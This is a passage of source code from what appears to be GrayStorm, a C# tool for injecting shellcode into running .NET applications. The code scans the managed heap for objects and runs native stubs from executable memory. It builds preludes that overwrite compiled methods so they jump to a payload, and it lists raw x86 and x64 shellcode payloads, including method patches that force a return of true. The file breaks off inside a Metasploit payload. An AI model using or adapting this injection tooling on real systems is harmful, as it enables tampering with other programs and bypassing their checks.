    List matchedObjects = null;
    objectsListBox.Items.Clear();
    objectsListBox.Items.Add(thisObject);

    // If the selection is itself a previous hit, search for the object it wraps.
    if (thisObject.GetType() == typeof(foundObject))
    {
        foundObject thisFoundObject = thisObject as foundObject;
        thisObject = thisFoundObject.targetObject;
    }

    //set subAmount on stack for each clr version
    // NOTE(review): the outer condition already requires clrVersion == '2', so the '4' branch can
    // never run and clrSub keeps its default on CLR 4 — verify that this is intended.
    if (IntPtr.Size == 4 && clrVersion == '2')
    {
        if (clrVersion == '2')
            clrSub = 1;
        else if (clrVersion == '4')
            clrSub = 2;
    }

    if (IntPtr.Size == 4)
    {
        // 32-bit: object address from the stack trick, MethodTable via the x86 stub; stop if none.
        obj = getObjectAddr(thisObject);
        // System.Windows.Forms.MessageBox.Show("OG Object is at " + obj.ToString("X"));

        methodTable = getObjectMethodTable(obj, getMethodTablex86);

        if (methodTable == IntPtr.Zero)
            return;

        Console.WriteLine("OG Object is at " + obj.ToString("X"));
        Console.WriteLine("method table is at " + methodTable.ToString("X"));

        // System.Windows.Forms.MessageBox.Show("OG Object is at " + obj.ToString("X"));
        // System.Windows.Forms.MessageBox.Show("method table is at " + methodTable.ToString("X"));
        matchedObjects = getAllObjects(obj, methodTable, getMethodTablex86, getMethodTablex86);
    }
    else if (IntPtr.Size == 8)
    {
        // 64-bit: same flow, but note there is no IntPtr.Zero check on methodTable here.
        obj = getObjectAddr64(thisObject);
        // System.Windows.Forms.MessageBox.Show("OG Object is at " + obj.ToString("X"));

        methodTable = getObjectMethodTable(obj, getMethodTablex64);
        // System.Windows.Forms.MessageBox.Show("OG MEtodTable is at " + methodTable.ToString("X"));

        matchedObjects = getAllObjects(obj, methodTable, getMethodTablex64, get3rdEntryx64);
    }


    //unsure if this foreach is needed right now... just take matchedObjects to array?
    // NOTE(review): actualObj is an IntPtr (value type), so "!= null" is always true.
    foreach (IntPtr actualObj in matchedObjects)
    {
        if (actualObj != null)
        {
            // Turn the raw address back into an object reference (no type or liveness check).
            if (IntPtr.Size == 4)
                foundObject = GetInstance(actualObj);
            else if (IntPtr.Size == 8)
                foundObject = GetInstance64(actualObj);

            //avoid all the thinLocked objects
            // var lockedBySomeoneElse = !System.Threading.Monitor.TryEnter(foundObject);
            // if (!lockedBySomeoneElse)
            // {
            // System.Threading.Monitor.Exit(foundObject);
            foundObject objTarget = new foundObject();
            objTarget.targetObject = foundObject;
            objTarget.name = thisObject.ToString();
            objTarget.addrOfObj = actualObj;
            objectsListBox.Items.Add(objTarget);
            //}
        }
    }
    // System.Windows.Forms.MessageBox.Show("num of objects is " + objectsListBox.Items.Count);
}
100 | #endregion init
101 |
102 | #region x86
103 |
104 | //Put wantedObject on the stack and grab its value as an IntPtr.
105 | //The stack is weird when actually running.
106 | //In Visual Studio, the location of refer is known and is easy to use
107 | //as (objectPointer+1) but these values are not present during runtime.
/// <summary>
/// 32-bit: returns the raw address of <paramref name="wantedObject"/> by reading the stack slot
/// three pointer-widths below the local <c>objectPointer</c> — presumably where the JIT placed
/// the argument when this was written (the comments above record that the offset differs
/// between Visual Studio and a plain run). This is a frame-layout assumption, not a contract:
/// another runtime, optimisation level or an attached debugger changes it, and nothing checks
/// that the slot holds an object reference. Returns IntPtr.Zero for null.
/// </summary>
public static IntPtr getObjectAddr(object wantedObject)
{
    if (wantedObject == null)
        return IntPtr.Zero;

    IntPtr objectPointer = IntPtr.Zero;
    unsafe
    {
        // System.Windows.Forms.MessageBox.Show("Address of objectPointer:" + (uint)(&objectPointer) + " " + *(&objectPointer));
        // System.Windows.Forms.MessageBox.Show("Address of refer:" + (uint)(&objectPointer- 3) + " " + *(&objectPointer - 3));
        return *(&objectPointer - 3);
    }
    // return objectPointer;
}
122 |
// x86 native stub executed through getObjectMethodTable (copied to memory obtained from
// assemblyHelpers.VirtualAlloc and called via getMethodTableDel): reads the first pointer of the
// object passed on the stack, i.e. its MethodTable. Public and mutable — anything in the process
// can rewrite these bytes before they run.
static public byte[] getMethodTablex86 = new byte[]
{
    0x8b, 0x44, 0x24, 0x04, //mov eax, [esp+4] (arg1 on the stack is the object table)
    0x8b, 0x00, //mov eax, [eax]] (first 4 bytes are the MethodTable)
    0xc3 //ret (return methodTable for comparsion)
};
129 |
// x86 placeholder for the 64-bit get3rdEntryx64: a bare ret. It is not used by getAddresses,
// which passes getMethodTablex86 twice on 32-bit instead.
static public byte[] get3rdEntryx32 = new byte[]
{
    0xc3
};
134 |
/// <summary>
/// 32-bit inverse of getObjectAddr: turns a raw address into an object reference by overwriting
/// the stack slot <c>clrSub</c> pointer-widths below <c>pointer</c> — assumed to be the slot the
/// JIT gave the local <c>refer</c> — and then returning <c>refer</c>. <c>refer</c> is initialised
/// with a System.Type only so that the slot exists. Nothing validates that
/// <paramref name="ptrIN"/> points at a live object of any particular type, and no pinning is
/// visible, so a compacting GC between obtaining the address and using it leaves a dangling
/// reference. Same frame-layout dependence as getObjectAddr.
/// </summary>
public static object GetInstance(IntPtr ptrIN)
{
    object refer = ptrIN.GetType();
    IntPtr pointer = ptrIN;

    unsafe
    {
        *(&pointer - clrSub) = *(&pointer); //move the pointer of our object into the actual object on the stack! This tricks the Framework to think that "object" was declared here!
    }
    //System.Windows.Forms.MessageBox.Show(refer.ToString());
    return refer;
}
147 | #endregion
148 |
149 | #region x64
150 |
/// <summary>
/// 64-bit counterpart of getObjectAddr: reads the stack slot <c>clrSub</c> pointer-widths
/// *above* <c>objectPointer</c>, assumed to hold the local <c>refer</c> (a copy of
/// <paramref name="wantedObject"/>). <c>objectPointer2</c> is unused. Same frame-layout caveats
/// as the 32-bit version. Returns IntPtr.Zero for null.
/// </summary>
public static IntPtr getObjectAddr64(object wantedObject)
{
    if (wantedObject == null)
        return IntPtr.Zero;

    IntPtr objectPointer = (IntPtr)4;
    object refer = wantedObject;
    IntPtr objectPointer2 = (IntPtr)8;

    unsafe
    {
        //System.Windows.Forms.MessageBox.Show("Address of objectPointer:" + (uint)(&objectPointer) + " address of objectPointer 2 " + (uint)(&objectPointer2));
        objectPointer = *(&objectPointer + clrSub);
    }

    return objectPointer;
}
168 |
// x64 counterpart of getMethodTablex86: dereferences the pointer passed in rcx
// (first argument under the x64 calling convention) and returns that word in rax.
static public byte[] getMethodTablex64 =
{
    0x48, 0x8b, 0x01, // mov rax, [rcx]
    0xc3,             // ret
};
174 |
// Call once the location of an object is known to check against its 3rd table entry :)
// (x64 stub; getAllObjects compares its result for each candidate with the value
// it produced for firstObjectPointer.)
static public byte[] get3rdEntryx64 =
{
    0x48, 0x8b, 0x41, 0x08,
    0x48, 0x83, 0xf8, 0x00,
    0x74, 0x03,
    0x48, 0x8b, 0x00,
    0xc3,
};
182 |
183 |
// x64 variant of GetInstance: re-types the raw address wantedObject as a managed
// object reference by overwriting the stack slot clrSub words above `objectPointer`
// (presumably where `refer` lives — TODO confirm) with the address. Same caveats
// as GetInstance: the address is not validated, the trick is frame-layout
// dependent, and clrSub is declared outside this view.
// NOTE(review): `wantedObject` is an IntPtr (a struct), so `wantedObject == null`
// is always false; the `return IntPtr.Zero` branch (boxed to object) is unreachable.
public static object GetInstance64(IntPtr wantedObject)
{
    if (wantedObject == null)
        return IntPtr.Zero;

    IntPtr objectPointer = wantedObject;
    object refer = wantedObject.GetType();
    IntPtr objectPointer2 = (IntPtr)8;

    unsafe
    {
        //System.Windows.Forms.MessageBox.Show("Address of objectPointer:" + (uint)(&objectPointer) + " address of objectPointer 2 " + (uint)(&objectPointer2));
        *(&objectPointer + clrSub) = *(&objectPointer);
    }
    //System.Windows.Forms.MessageBox.Show(refer.ToString());
    return refer;
}
201 |
202 | #endregion x64
203 |
204 | #region generic
// Runs the native stub in methodFinderIN against objectIN and returns whatever it
// produces (intended to be the object's MethodTable pointer, i.e. its first word).
// Steps: copy the stub into memory obtained from assemblyHelpers.VirtualAlloc, wrap
// it in a getMethodTableDel delegate, change the protection of the first IntPtr.Size
// bytes at objectIN to 0x40 (PAGE_EXECUTE_READWRITE) and invoke the stub. The stub
// memory is released with VirtualFree(p, 0, 0x8000) (MEM_RELEASE) on both the
// success and the failure path; on any exception a MessageBox is shown and
// IntPtr.Zero is returned. The previous protection is captured in lpflOldProtect
// but never restored.
// Detection note: a VirtualProtect to PAGE_EXECUTE_READWRITE on heap memory followed
// by execution out of a freshly allocated region is a strong behavioural indicator of
// in-process code tampering and is worth alerting on in the host.
public static IntPtr getObjectMethodTable(IntPtr objectIN, byte[] methodFinderIN)
{
    IntPtr p = assemblyHelpers.VirtualAlloc(methodFinderIN);
    IntPtr methodTable = IntPtr.Zero;
    getMethodTableDel fireShellcode = (getMethodTableDel)System.Runtime.InteropServices.Marshal.GetDelegateForFunctionPointer(p, typeof(getMethodTableDel));

    try
    {
        uint lpflOldProtect = 0;
        assemblyHelpers.VirtualProtect(objectIN, (uint)IntPtr.Size, (uint)0x40, out lpflOldProtect);
        methodTable = fireShellcode(objectIN);
    }
    catch (System.Exception ex)
    {
        System.Windows.Forms.MessageBox.Show("Failed to get MethodTable " + ex.Message);
        assemblyHelpers.VirtualFree(p, 0, 0x8000);
        return IntPtr.Zero;
    }
    assemblyHelpers.VirtualFree(p, 0, 0x8000);
    return methodTable;
}
226 |
/* Scan through heap and compare first four bytes of all objects to the method table pointer...
   requires more or less a brute force approach :( (for now) */
// Walks pointer-sized steps away from firstObjectPointer, first downwards and then
// upwards, runs the typeOfASM stub on each candidate address and, when the returned
// word equals methodTable, runs the entryIN stub as well and requires its result to
// match the value obtained from firstObjectPointer. Matching addresses are collected
// and returned (elements are IntPtr, see matchedObjects.Add; the generic argument of
// `List` is missing in this view).
//
// Points a maintainer should know (all visible below):
//  * Two executable stubs are allocated but only getMethodTablefuncPtr is released at
//    the end; get3rdEntry is never passed to VirtualFree.
//  * Every probe is wrapped in catch (Exception). Only messages that look like an
//    access violation are counted in `err`, and `err` is reset to 0 only on a match,
//    so a loop stops after 20 faulting reads since the last match, not 20 consecutive
//    ones. Any other exception is swallowed and the loop simply continues.
//  * The downward loop has its VirtualProtect call commented out; the upward loop sets
//    each candidate's page to 0x04 (PAGE_READWRITE) before probing and never restores it.
//  * WORK (the re-typed object from GetInstance/GetInstance64), size and lpflOldProtect
//    are written but never read.
//  * A MessageBox with the last probed address is shown between the two loops.
// NOTE(review): on .NET 4.0+ an AccessViolationException is a corrupted-state exception
// and is not delivered to catch (Exception) unless the process opts in
// (legacyCorruptedStateExceptionsPolicy or [HandleProcessCorruptedStateExceptions]);
// confirm the host configuration this was written against.
public static List getAllObjects(IntPtr firstObjectPointer, IntPtr methodTable, byte[] typeOfASM, byte[] entryIN)
{
    List matchedObjects = new List();

    int counter = 1;
    int i = 0;
    int err = 0;
    uint lpflOldProtect = 0;
    IntPtr testObjectLocation = IntPtr.Zero;
    IntPtr testMethodTable = IntPtr.Zero;
    IntPtr test3rdEntry = IntPtr.Zero;
    IntPtr size = IntPtr.Zero;
    object WORK = null;
    IntPtr getMethodTablefuncPtr = assemblyHelpers.VirtualAlloc(typeOfASM);
    getMethodTableDel fireShellcode = (getMethodTableDel)System.Runtime.InteropServices.Marshal.GetDelegateForFunctionPointer(getMethodTablefuncPtr, typeof(getMethodTableDel));

    IntPtr get3rdEntry = assemblyHelpers.VirtualAlloc(entryIN);
    getMethodTableDel getSecondRef = (getMethodTableDel)System.Runtime.InteropServices.Marshal.GetDelegateForFunctionPointer(get3rdEntry, typeof(getMethodTableDel));

    // Reference value: the "third entry" of the known-good object; candidates must reproduce it.
    IntPtr thirdTable = getSecondRef(firstObjectPointer);
    // System.Windows.Forms.MessageBox.Show("Third entry at " + thirdTable.ToString("X"));

    //count down first until out of the heap
    while (true)
    {
        try
        {
            i = counter * IntPtr.Size;
            counter++;
            testObjectLocation = new IntPtr(firstObjectPointer.ToInt64() - i); //get a byte value to test on for an object
            // assemblyHelpers.VirtualProtect(testObjectLocation, (uint)IntPtr.Size, (uint)0x04, out lpflOldProtect);
            testMethodTable = fireShellcode(testObjectLocation);

            if (testMethodTable == methodTable)
            {
                test3rdEntry = getSecondRef(testObjectLocation);
                if (test3rdEntry == thirdTable)
                {
                    Console.WriteLine("Object is at " + testObjectLocation.ToString("X"));

                    if (IntPtr.Size == 4)
                        WORK = GetInstance(testObjectLocation);
                    else if (IntPtr.Size == 8)
                        WORK = GetInstance64(testObjectLocation);

                    matchedObjects.Add(testObjectLocation);

                    Console.WriteLine("Object is at " + testObjectLocation.ToString("X"));
                    err = 0;
                }
            }

        }
        catch (Exception ex)
        {
            // Only access violations count towards the stop condition; see the header note.
            if (ex.Message.Contains("Attempted to read or write protected memory") || ex.Message.Contains("AccessViolationException"))
            {
                err++;
                if (err > 20)
                    break;
            }
        }
    }

    System.Windows.Forms.MessageBox.Show(testObjectLocation.ToString("X"));
    counter = 1;
    err = 0;
    //then count up from firstObjectPointer until out of the heap
    while (true)
    {
        try
        {
            i = counter * IntPtr.Size;
            counter++;
            testObjectLocation = new IntPtr(firstObjectPointer.ToInt64() + i); //get a byte value to test on for an object
            assemblyHelpers.VirtualProtect(testObjectLocation, (uint)IntPtr.Size, (uint)0x04, out lpflOldProtect);
            testMethodTable = fireShellcode(testObjectLocation);

            if (testMethodTable == methodTable)
            {
                test3rdEntry = getSecondRef(testObjectLocation);
                if (test3rdEntry == thirdTable)
                {
                    Console.WriteLine("Object is at " + testObjectLocation.ToString("X"));

                    if (IntPtr.Size == 4)
                        WORK = GetInstance(testObjectLocation);
                    else if (IntPtr.Size == 8)
                        WORK = GetInstance64(testObjectLocation);

                    matchedObjects.Add(testObjectLocation);

                    Console.WriteLine("Object is at " + testObjectLocation.ToString("X"));
                    err = 0;
                }
            }
        }
        catch (Exception ex)
        {
            if (ex.Message.Contains("Attempted to read or write protected memory") || ex.Message.Contains("AccessViolationException"))
            {
                err++;
                if (err > 20)
                    break;
            }

        }
    }
    // System.Windows.Forms.MessageBox.Show(testObjectLocation.ToString("X"));


    // Only the first stub is released here; get3rdEntry is leaked.
    assemblyHelpers.VirtualFree(getMethodTablefuncPtr, 0, 0x8000);
    return matchedObjects;
}
343 | #endregion generic
344 | }
345 | }
--------------------------------------------------------------------------------
/shellcodes/CToAsmAttackChain.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 |
6 | namespace GrayStorm
7 | {
/// <summary>
/// Builders for the small hand-encoded native stubs GrayStorm writes over a managed
/// method's compiled code (the "prelude") and for the cleanup stub it places inside a
/// payload buffer (GrayStorm.assemblyHelpers.holder). x86 and x64 variants are kept
/// side by side; the author marks the x64 path as TODO.
/// </summary>
public class CToAsmAttackChain
{
    #region x86 attack chains
    /// <summary>
    /// Cleanup for the payload to restore the original method. Requires 12 bytes for 32bit.
    /// Writes, into GrayStorm.assemblyHelpers.holder starting at index
    /// holder.Length - indexToStartCleaning: mov edx, containedIndex; mov eax, methodPointer; call eax.
    /// The indices are not bounds-checked: indexToStartCleaning must lie in [12, holder.Length]
    /// or an IndexOutOfRangeException is thrown. methodPointer is truncated to 32 bits.
    /// </summary>
    /// <param name="containedIndex">The index in StorageInformation of the Method that will be changed</param>
    /// <param name="methodPointer">The pure IntPtr of the Method that is changing</param>
    /// <param name="indexToStartCleaning">The index in the payload of where 12 bytes can be written.</param>
    static public void payloadCleaner(int containedIndex, IntPtr methodPointer, int indexToStartCleaning)
    {
        int returnMethod = (int)methodPointer.ToInt64();
        int length = GrayStorm.assemblyHelpers.holder.Length - indexToStartCleaning;
        GrayStorm.assemblyHelpers.holder[length] = 0xba; //mov edx
        GrayStorm.assemblyHelpers.holder[length + 1] = (byte)(containedIndex);
        GrayStorm.assemblyHelpers.holder[length + 2] = (byte)(containedIndex >> 8);
        GrayStorm.assemblyHelpers.holder[length + 3] = (byte)(containedIndex >> 16);
        GrayStorm.assemblyHelpers.holder[length + 4] = (byte)(containedIndex >> 24); //contained index
        GrayStorm.assemblyHelpers.holder[length + 5] = 0xb8; //mov eax
        GrayStorm.assemblyHelpers.holder[length + 6] = (byte)(returnMethod);
        GrayStorm.assemblyHelpers.holder[length + 7] = (byte)(returnMethod >> 8);
        GrayStorm.assemblyHelpers.holder[length + 8] = (byte)(returnMethod >> 16);
        GrayStorm.assemblyHelpers.holder[length + 9] = (byte)(returnMethod >> 24); //move eax to returnMethod address
        GrayStorm.assemblyHelpers.holder[length + 10] = 0xff;
        GrayStorm.assemblyHelpers.holder[length + 11] = 0xd0; //call eax
    }

    /// <summary>
    /// Create the new method prelude that will be plotted over the target method.
    /// Returns an 8-byte x86 stub: mov eax, payloadAddress; call eax; ret.
    /// payloadAddress is truncated to 32 bits.
    /// </summary>
    /// <param name="payloadAddress">The address of the payload. Will be converted into an 8-byte prelude.</param>
    /// <returns>The 8 bytes to write over the target method.</returns>
    static public byte[] newPrelude(IntPtr payloadAddress)
    {
        int payloadIntPtr = (int)payloadAddress.ToInt64();
        byte[] newMemory = new byte[8];
        newMemory[0] = 0xb8;
        newMemory[1] = (byte)(payloadIntPtr);
        newMemory[2] = (byte)(payloadIntPtr >> 8);
        newMemory[3] = (byte)(payloadIntPtr >> 16);
        newMemory[4] = (byte)(payloadIntPtr >> 24); //move eax to payload address
        newMemory[5] = 0xff;
        newMemory[6] = 0xd0; //call eax
        newMemory[7] = 0xc3; //ret
        return newMemory;
    }

    //TODO: 64bit attack
    //20 bytes needed for 64bit theoretically
    /// <summary>
    /// x64 counterpart of payloadCleaner. Writes 20 bytes into GrayStorm.assemblyHelpers.holder
    /// starting at holder.Length - indexToStartCleaning: xor rax, rax; mov edx, containedIndex;
    /// mov rax, methodPointer (64-bit immediate); call rax. Not bounds-checked:
    /// indexToStartCleaning must lie in [20, holder.Length].
    /// </summary>
    /// <param name="containedIndex">The index in StorageInformation of the Method that will be changed</param>
    /// <param name="methodPointer">The pure IntPtr of the Method that is changing</param>
    /// <param name="indexToStartCleaning">The index in the payload of where the 20 bytes can be written.</param>
    static public void payloadCleaner64(int containedIndex, IntPtr methodPointer, int indexToStartCleaning)
    {
        Int64 returnMethod = (Int64)methodPointer.ToInt64();
        int length = GrayStorm.assemblyHelpers.holder.Length - indexToStartCleaning;
        GrayStorm.assemblyHelpers.holder[length] = 0x48;//xor rax, rax
        GrayStorm.assemblyHelpers.holder[length + 1] = 0x31;//xor rax, rax
        GrayStorm.assemblyHelpers.holder[length + 2] = 0xc0;//xor rax, rax
        GrayStorm.assemblyHelpers.holder[length + 3] = 0xba;//mov edx, #
        GrayStorm.assemblyHelpers.holder[length + 4] = (byte)(containedIndex);
        GrayStorm.assemblyHelpers.holder[length + 5] = (byte)(containedIndex >> 8);
        GrayStorm.assemblyHelpers.holder[length + 6] = (byte)(containedIndex >> 16);
        GrayStorm.assemblyHelpers.holder[length + 7] = (byte)(containedIndex >> 24); //contained index
        GrayStorm.assemblyHelpers.holder[length + 8] = 0x48;//mov rax, #
        GrayStorm.assemblyHelpers.holder[length + 9] = 0xb8;//mov rax, # (second byte of the same instruction)
        GrayStorm.assemblyHelpers.holder[length + 10] = (byte)(returnMethod);//move rax to returnMethod address
        GrayStorm.assemblyHelpers.holder[length + 11] = (byte)(returnMethod >> 8);
        GrayStorm.assemblyHelpers.holder[length + 12] = (byte)(returnMethod >> 16);
        GrayStorm.assemblyHelpers.holder[length + 13] = (byte)(returnMethod >> 24);
        GrayStorm.assemblyHelpers.holder[length + 14] = (byte)(returnMethod >> 32);
        GrayStorm.assemblyHelpers.holder[length + 15] = (byte)(returnMethod >> 40);
        GrayStorm.assemblyHelpers.holder[length + 16] = (byte)(returnMethod >> 48);
        GrayStorm.assemblyHelpers.holder[length + 17] = (byte)(returnMethod >> 56);
        GrayStorm.assemblyHelpers.holder[length + 18] = 0xff;//call rax
        GrayStorm.assemblyHelpers.holder[length + 19] = 0xd0;
    }


    /// <summary>
    /// Create the new method prelude that will be plotted over the target method (x64).
    /// Returns a 12-byte stub: mov rax, payloadAddress (64-bit immediate); call rax.
    /// Unlike newPrelude there is no trailing ret.
    /// </summary>
    /// <param name="payloadAddress">The address of the payload. Will be converted into a 12-byte prelude.</param>
    /// <returns>The 12 bytes to write over the target method.</returns>
    static public byte[] newPrelude64(IntPtr payloadAddress)
    {
        Int64 payloadIntPtr = (Int64)payloadAddress.ToInt64();
        byte[] newMemory = new byte[12];
        newMemory[0] = 0x48;
        newMemory[1] = 0xb8;
        newMemory[2] = (byte)(payloadIntPtr);
        newMemory[3] = (byte)(payloadIntPtr >> 8);
        newMemory[4] = (byte)(payloadIntPtr >> 16);
        newMemory[5] = (byte)(payloadIntPtr >> 24);
        newMemory[6] = (byte)(payloadIntPtr >> 32);
        newMemory[7] = (byte)(payloadIntPtr >> 40);
        newMemory[8] = (byte)(payloadIntPtr >> 48);
        newMemory[9] = (byte)(payloadIntPtr >> 56); //move rax to payload address
        newMemory[10] = 0xff;
        newMemory[11] = 0xd0; //call rax
        return newMemory;
    }
    #endregion x86 attack chains
}
113 | }
114 |
--------------------------------------------------------------------------------
/shellcodes/dataBox.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 |
6 | namespace GrayStorm
7 | {
8 | #region dataBox
/// <summary>
/// A named payload entry: the raw bytes plus the offset the cleanup writer is given
/// (presumably interpreted as a distance from the end of the buffer, as in
/// CToAsmAttackChain.payloadCleaner). ToString returns the name so instances can
/// be displayed directly in list controls.
/// </summary>
public class dataBox
{
    public string name;
    public byte[] data;
    public int indexToStartCleaning;

    /// <summary>Stores the three values as given; no copying or validation is done.</summary>
    public dataBox(string nameIN, byte[] dataIN, int indexToStartCleaningIN)
    {
        this.indexToStartCleaning = indexToStartCleaningIN;
        this.data = dataIN;
        this.name = nameIN;
    }

    /// <summary>The display name of this entry.</summary>
    public override string ToString()
    {
        return this.name;
    }
}
27 | #endregion dataBox
28 | }
29 |
--------------------------------------------------------------------------------
/shellcodes/payloads.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 |
6 | namespace GrayStorm.shellcodes
7 | {
/// <summary>
/// Catalogue of raw native code blobs shipped with GrayStorm, wrapped in dataBox
/// entries by payloadsList()/metaSploitList(). The entry set is chosen by pointer
/// size (IntPtr.Size == 4 → x86 blobs, otherwise x64 blobs). The blobs are executed
/// elsewhere via VirtualAlloc + delegate; the bytes themselves are not interpreted
/// by any code in this file.
/// </summary>
class payloads
{
    #region init
    /// <summary>
    /// Built-in demo payloads for the current bitness. The third dataBox argument is
    /// the indexToStartCleaning handed to the cleanup writer (0 for the entries that
    /// reserve no room).
    /// </summary>
    public static System.Collections.Generic.List payloadsList()
    {
        System.Collections.Generic.List payloads = new List();
        if (IntPtr.Size == 4)
        {
            payloads.Add(new dataBox("returnTrue", returnTrue, 0));
            payloads.Add(new dataBox("returnFalse", returnFalse, 0));
            payloads.Add(new dataBox("lockWorkSation", lockWorkSation, 0));
            payloads.Add(new dataBox("testingShellcodeFire", testingShellcodeFire, 21));
        }
        else
        {
            payloads.Add(new dataBox("message box 64bit Topher", test64BitMessageBox, 0));
            payloads.Add(new dataBox("test dat hook", SixtyFourbitHookTest, 148));
            payloads.Add(new dataBox("Return True", returnTrue64, 0));
            payloads.Add(new dataBox("Return False", returnFalse64, 0));
        }
        return payloads;
    }

    /// <summary>Externally generated blobs (one per bitness) exposed as dataBox entries.</summary>
    public static System.Collections.Generic.List metaSploitList()
    {
        System.Collections.Generic.List payloads = new List();
        if (IntPtr.Size == 4)
        {
            payloads.Add(new dataBox("msfCALC", msfCALC, 0));
        }
        else
        {
            payloads.Add(new dataBox("64bit Test MSF", test64Bit, 0));
        }
        return payloads;
    }

    #endregion init

    #region x86
    // Sets eax to 1 and returns (a replacement body for a bool-returning method).
    static public byte[] returnTrue = new byte[]
    {
        0x31, 0xc0, //xor eax, eax &
        0x40, //inc eax
        0xc3 //ret
    };

    // Note: the author's original comments had pushad/popad swapped; 0x60 is pushad
    // and 0x61 is popad (compare call_a_fun_ptr below).
    static public byte[] returnFalse = new byte[]
    {
        0x60, //pushad
        0x31, 0xc0, //xor eax, eax &
        0x89, 0x44, 0x24, //mov eax X
        0x1c,
        0x61, //popad
        0xc3 //ret
    };

    static public byte[] lockWorkSation = new byte[]
    {
        0xe8, 0x0b, 0x00, 0x00, 0x00, 0x75, 0x73, 0x65, 0x72, 0x33, 0x32, 0x2e,
        0x64, 0x6c, 0x6c, 0x00, 0x5b, 0x60, 0x89, 0xe5, 0x83, 0xec, 0x08, 0x64,
        0xa1, 0x30, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x0c, 0x8b, 0x40, 0x14,
        0x8b, 0x00, 0x8b, 0x00, 0x8b, 0x00, 0x8b, 0x40, //walk the PEB and get 4th entry for kernel32 base address!
        0x10, 0x89, 0x45, 0xfc, 0x50, 0x56, 0x68,
        0x8e, 0x4e, 0x0e, 0xec, 0xff, 0x75, 0xfc, 0xe8, 0x33, 0x00, 0x00, 0x00,
        0x53, 0xff, 0xd0, 0x89, 0x45, 0xf8, 0x5e, 0x58, 0xe8, 0x00, 0x00, 0x00,
        0x00, 0x68, 0x8f, 0xe6, 0x24, 0x57, 0xff, 0x75, 0xf8, 0xe8, 0x19, 0x00,
        0x00, 0x00, 0xff, 0xd0, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x68, 0x7e, 0xd8,
        0xe2, 0x73, 0xff, 0x75, 0xfc, 0xe8, 0x05, 0x00, 0x00, 0x00, 0x31, 0xf6,
        0x56, 0xff, 0xd0, 0x60, 0x8b, 0x6c, 0x24, 0x24, 0x8b, 0x45, 0x3c, 0x8b,
        0x54, 0x05, 0x78, 0x01, 0xea, 0x8b, 0x4a, 0x18, 0x8b, 0x5a, 0x20, 0x01,
        0xeb, 0xe3, 0x34, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xee, 0x31, 0xff, 0x31,
        0xc0, 0xfc, 0xac, 0x84, 0xc0, 0x74, 0x07, 0xc1, 0xcf, 0x0d, 0x01, 0xc7,
        0xeb, 0xf4, 0x3b, 0x7c, 0x24, 0x28, 0x75, 0xe1, 0x8b, 0x5a, 0x24, 0x01,
        0xeb, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x5a, 0x1c, 0x01, 0xeb, 0x8b, 0x04,
        0x8b, 0x01, 0xe8, 0x89, 0x44, 0x24, 0x1c, 0x61, 0xc3
    };



    // Not referenced by payloadsList()/metaSploitList() in this file.
    static public byte[] call_a_fun_ptr = new byte[]
    {
        0x60, //pushad
        0x8b, 0x44, 0x24, 0x24, //mov eax, [esp - 0x24]
        0xff, 0xd0, //call eax
        0x61, //popad
        0xc3//ret
    };


    //21 bytes from bottom there is room for the hook before the last ret...
    // (matches the indexToStartCleaning of 21 given in payloadsList)
    static public byte[] testingShellcodeFire = new byte[]
    {
        0x55, 0x89, 0xe5, 0x89, 0xe7, 0x68, 0x6c, 0x6c, 0x00, 0x00, 0x68, 0x33,
        0x32, 0x2e, 0x64, 0x68, 0x75, 0x73, 0x65, 0x72, 0x89, 0xe3, 0x89, 0xe5,
        0x83, 0xec, 0x40, 0x64, 0xa1, 0x30, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x0c,
        0x8b, 0x70, 0x14, 0x8b, 0x16, 0x8b, 0x12, 0x8b, 0x12, 0xad, 0x8b, 0x52,
        0x10, 0x89, 0x55, 0xfc, 0x50, 0x56, 0x68, 0x8e, 0x4e, 0x0e, 0xec, 0xff,
        0x75, 0xfc, 0xe8, 0x53, 0x00, 0x00, 0x00, 0x53, 0xff, 0xd0, 0x89, 0x45,
        0xf8, 0x5e, 0x58, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x68, 0xa8, 0xa2, 0x4d,
        0xbc, 0xff, 0x75, 0xf8, 0xe8, 0x39, 0x00, 0x00, 0x00, 0x68, 0x6f, 0x78,
        0x20, 0x00, 0x68, 0x61, 0x67, 0x65, 0x42, 0x68, 0x4d, 0x65, 0x73, 0x73,
        0x68, 0x65, 0x72, 0x73, 0x20, 0x68, 0x54, 0x6f, 0x70, 0x68, 0x89, 0xe3,
        0x68, 0x73, 0x74, 0x20, 0x00, 0x68, 0x79, 0x20, 0x74, 0x65, 0x68, 0x53,
        0x69, 0x6c, 0x6c, 0x89, 0xe1, 0x6a, 0x00, 0x53, 0x51, 0x6a, 0x00, 0xff,
        0xd0, 0x83, 0xc4, 0x40, 0xeb, 0x4e, 0x60, 0x8b, 0x6c, 0x24, 0x24, 0x8b,
        0x45, 0x3c, 0x8b, 0x54, 0x05, 0x78, 0x01, 0xea, 0x8b, 0x4a, 0x18, 0x8b,
        0x5a, 0x20, 0x01, 0xeb, 0xe3, 0x34, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xee,
        0x31, 0xff, 0x31, 0xc0, 0xfc, 0xac, 0x84, 0xc0, 0x74, 0x07, 0xc1, 0xcf,
        0x0d, 0x01, 0xc7, 0xeb, 0xf4, 0x3b, 0x7c, 0x24, 0x28, 0x75, 0xe1, 0x8b,
        0x5a, 0x24, 0x01, 0xeb, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x5a, 0x1c, 0x01,
        0xeb, 0x8b, 0x04, 0x8b, 0x01, 0xe8, 0x89, 0x44, 0x24, 0x1c, 0x61, 0xc3,
        0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
        0x90, 0x90, 0x90, 0x90, 0x90,
        0x89, 0xfc, 0x5d,
        //0x58, 0x83, 0xe8, 0x07, 0x50,
        0xc3
    };


    static public byte[] msfCALC = new byte[]
    {
